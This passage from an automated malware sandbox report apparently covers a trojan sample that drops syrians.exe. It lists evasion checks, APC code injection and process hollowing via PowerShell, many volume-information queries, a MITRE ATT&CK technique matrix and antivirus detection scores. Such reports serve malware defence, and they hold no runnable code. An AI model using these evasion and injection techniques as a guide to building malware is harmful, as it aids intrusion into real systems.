Source: syrians.exe, 00000008.00000003.3104143779.0000000005A26000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357914515.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000002.3380721457.00000000059C8000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313067591.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279283600.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3139330187.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093058995.0000000005A26000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011677797.0000000005A28000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3116395498.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A28000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3046064176.0000000005A28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: syrians.exe, 00000008.00000003.3104143779.0000000005A26000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357914515.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313067591.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279283600.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3139330187.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093058995.0000000005A26000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011677797.0000000005A28000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3116395498.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A28000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3046064176.0000000005A28000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2966271594.0000000005A2A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWVX8D
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\7uY105UTJU.exe	API call chain: ExitProcess graph end node			graph_0-3285
Source: C:\Users\user\Desktop\7uY105UTJU.exe	API call chain: ExitProcess graph end node			graph_0-3437

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\syrians.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\syrians.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\syrians.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\syrians.exe base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Users\user\AppData\Local\Temp\syrians.exe base: 1660000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Users\user\AppData\Local\Temp\syrians.exe "C:\Users\user\AppData\Local\Temp\syrians.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\7uY105UTJU.exe

0_2_00403532

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	211 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	411 Process Injection	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	411 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	114 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
7uY105UTJU.exe	50%	ReversingLabs	Win32.Trojan.Leonem
7uY105UTJU.exe	61%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsr144.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsr144.tmp\nsExec.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\syrians.exe	50%	ReversingLabs	Win32.Trojan.Leonem
